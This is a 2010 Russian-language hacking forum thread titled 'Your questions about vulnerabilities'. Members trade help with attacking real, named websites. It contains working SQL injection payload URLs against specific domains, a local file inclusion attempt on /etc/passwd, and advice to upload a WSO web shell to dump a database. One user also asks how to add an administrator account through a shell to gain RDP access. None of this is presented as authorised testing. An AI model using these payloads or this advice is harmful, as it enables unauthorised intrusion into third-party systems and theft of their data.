Ваши вопросы по уязвимостям.

Gorev · 15 Sep 2010

NorB said:

Народ если я делаю подбор кол-ва колонок по group by а потом делаю запрос с юнионом мне форбиден к скрипту вылетает - это фильтрация юнион и селекта?
Click to expand...

попробуй как слепую крути, вариантов много что там фильтруется...

Gorev · 15 Sep 2010

jecka3000 said:

при переходе в какую-нибудь диру пишет:
You don't have permission to access /admin on this server.

чем спастись от этого?
Click to expand...

скорее всего фильтрация по айпи... так что не судьба..если конечно админ сайта не твой друг...

hacker-nubik · 16 Sep 2010

Есть обычная blind sql inj, фильтруется LIMIT? Как можно раскрутить без LIMIT'a?

DrakonHaSh · 16 Sep 2010

hacker-nubik
http://raz0r.name/obzory/group_concat/
и особенно, ближе к самому концу, коммент от iHornet

еще сюда: https://rdot.org/forum/showthread.php?t=60 глянь

а как это к слепой прикрутить включай мозг

jecka3000 · 17 Sep 2010

помогите заинклудить
http://luvaccessories.com/shopping.php?category_name=Romantic_Gifts&page=../../../../etc/pssswd%00

547 · 19 Sep 2010

как слить базу данных мускул? есть доступ к фтп.

Axel_Ustus · 19 Sep 2010

http://www.skunk2.com/news2.php?news_id=43+union+select+1,2--
выдает ошибку хотя количество полей подобрано верно
обьясните почему и как выкрутиться

547 · 19 Sep 2010

Nightmarе said:

Залить шелл, лучше WSO, и через него сдампить.
Click to expand...

я пробовал неполучилось
пишет error can't open file
а теперь в предачу еще пишет
You were denied access because:

Access denied by access control list.
но это изза прокси...

может посоветуете какойнибудь провереный дампер

Gorev · 19 Sep 2010

Axel_Ustus said:

http://www.skunk2.com/news2.php?news_id=43+union+select+1,2--
выдает ошибку хотя количество полей подобрано верно
обьясните почему и как выкрутиться
Click to expand...

BLIND

547 · 19 Sep 2010

как узнать список таблиц из определенной бд?
я пробовал чтото вроде этого
http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_concat%28table_name%29%29%29,7,8,9,10+from+information_schema.schemata+where+schema_name=0x00000000
невыйшло..

Blizzard · 19 Sep 2010

547 said:

как узнать список таблиц из определенной бд?
я пробовал чтото вроде этого
http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_concat%28table_name%29%29%29,7,8,9,10+from+information_schema.schemata+where+schema_name=0x00000000
невыйшло..
Click to expand...

from+information_schema.tables+where+table_schema=0x000

Strilo4ka · 19 Sep 2010

547
1) кавычки хексить/чарить не надо;
2) если бока, то тащи с INFORMATION_SCHEMA.COLUMNS->TABLE_NAME
или Mysql->columns_priv-> Table_name если возможно.

Darth Padla · 19 Sep 2010

SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция' LIKE CONCAT('%',url,'%')
как раскрутить?

Gorev · 19 Sep 2010

эфект тот же....

roddik · 19 Sep 2010

если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...

kfor · 19 Sep 2010

roddik said:

если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...
Click to expand...

Так сложно сказать.. кидай в личку сылку если хочешь.. надо смотреть..

Darth Padla · 19 Sep 2010

Strilo4ka said:

интересно

SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1/*

SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1--

SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1#
Click to expand...

Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1

kfor · 19 Sep 2010

Darth Padla said:

Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1
Click to expand...

ну могу тебе сказать тока как и предыдущему человеку кидай сыль в личку... ему ответ кинул надеюсь поможет ... если смогу и тебе помогу..

Darth Padla · 20 Sep 2010

А почему в личку?мне не жалко,просто из принципа раскрутить хочется.

view-source:http://znakomye.ru/news.php?дальше скуля

GroM88 · 20 Sep 2010

Народ, такой вопрос.
Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.
Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?

Ваши вопросы по уязвимостям.

Gorev Level 8

Gorev Level 8

hacker-nubik New Member

DrakonHaSh Elder - Старейшина

jecka3000 Elder - Старейшина

547 Active Member

Axel_Ustus New Member

547 Active Member

Gorev Level 8

547 Active Member

Blizzard Member

Strilo4ka

Darth Padla Member

Gorev Level 8

roddik Member

kfor Elder - Старейшина

Darth Padla Member

kfor Elder - Старейшина

Darth Padla Member

GroM88 Elder - Старейшина

Useful Searches

Ваши вопросы по уязвимостям.

Gorev Level 8

Gorev Level 8

hacker-nubik New Member

DrakonHaSh Elder - Старейшина

jecka3000 Elder - Старейшина

547 Active Member

Axel_Ustus New Member

547 Active Member

Gorev Level 8

547 Active Member

Blizzard Member

Strilo4ka

Darth Padla Member

Gorev Level 8

roddik Member

kfor Elder - Старейшина

Darth Padla Member

kfor Elder - Старейшина

Darth Padla Member

GroM88 Elder - Старейшина